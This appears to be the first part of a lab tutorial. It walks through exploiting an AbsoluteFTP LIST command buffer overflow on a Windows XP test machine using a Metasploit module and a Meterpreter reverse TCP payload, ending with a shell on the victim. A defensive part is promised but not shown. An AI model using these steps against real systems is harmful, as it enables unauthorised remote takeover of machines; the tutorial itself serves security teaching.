I am writing this article into 2 parts, In 1st part i will show you how to exploit AbsoluteFTP LIST Command Remote Buffer Overflow Vulnerability in windows with Metasploit Express Edition and In 2nd part i will show you how to prevent exploitation of AbsoluteFTP LIST Command Remote Buffer Overflow Vulnerability in windows with Symantec Critical System Protection (SCSP)
AbsoluteFTP LIST Command Remote Buffer Overflow
This module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command.
Exploitation of AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow
1. Our Victim is using windows xp professional SP2 (192.168.42.71) and AbsoluteFTP is installed on Victim Machine.
2. I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.62
3. I am using windows/ftp/absolute_ftp_list_bof metasploit module to exploit AbsoluteFTP LIST Command Remote Buffer Overflow (use exploit/windows/ftp/absolute_ftp_list_bof).
4. To view available option run show options command.I have to set the srvhost i.e. attacker machine ip address (set srvhost 192.168.42.62).
5. I am using windows/meterpreter/reverse_tcp payload.
6. Now i have to enter LHOST (Local Host) i.e 192.168.42.62 (Attacker Machine IP Address).
7. Write exploit and Hit Enter. Now i successfully launched the attack.
8) When our victim tries to make ftp connection with attacker machine.
9) Exploit will execute on Victim machine and give shell to the attacker machine.Attacker got the meterpreter shell of Our victim machine.
10) Let's type ipconfig command to verify Whether we enter into victim machine or not.
So I successfully entered into the Victim machine and get the meterpreter shell of victim machine. In next part i will show you how to prevent exploitation of AbsoluteFTP LIST Command Remote Buffer Overflow Vulnerability in windows with Symantec Critical System Protection (SCSP).